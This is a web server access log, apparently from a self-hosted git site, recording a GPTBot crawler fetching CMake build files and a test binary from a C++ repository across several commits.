-[17/Feb/2026:15:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11192] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16400] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" -[17/Feb/2026:15:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29812] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11517] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" -[17/Feb/2026:15:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14305] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" -[17/Feb/2026:15:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14305] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39748] [Gzip 13.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" -[17/Feb/2026:15:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:15:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51203] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 51202] [Gzip 26.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10221] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" -[17/Feb/2026:15:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 9933] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16185] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" -[17/Feb/2026:15:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16186] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" -[17/Feb/2026:15:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 21646] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 10222] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/TestApp" -[17/Feb/2026:15:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10773] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" -[17/Feb/2026:15:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11826] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11163] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 11263] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 29811] [Gzip 7.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 11193] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14297] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:15:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 9930] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16919] [Gzip 10.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/Makefile" -[17/Feb/2026:15:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11822] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 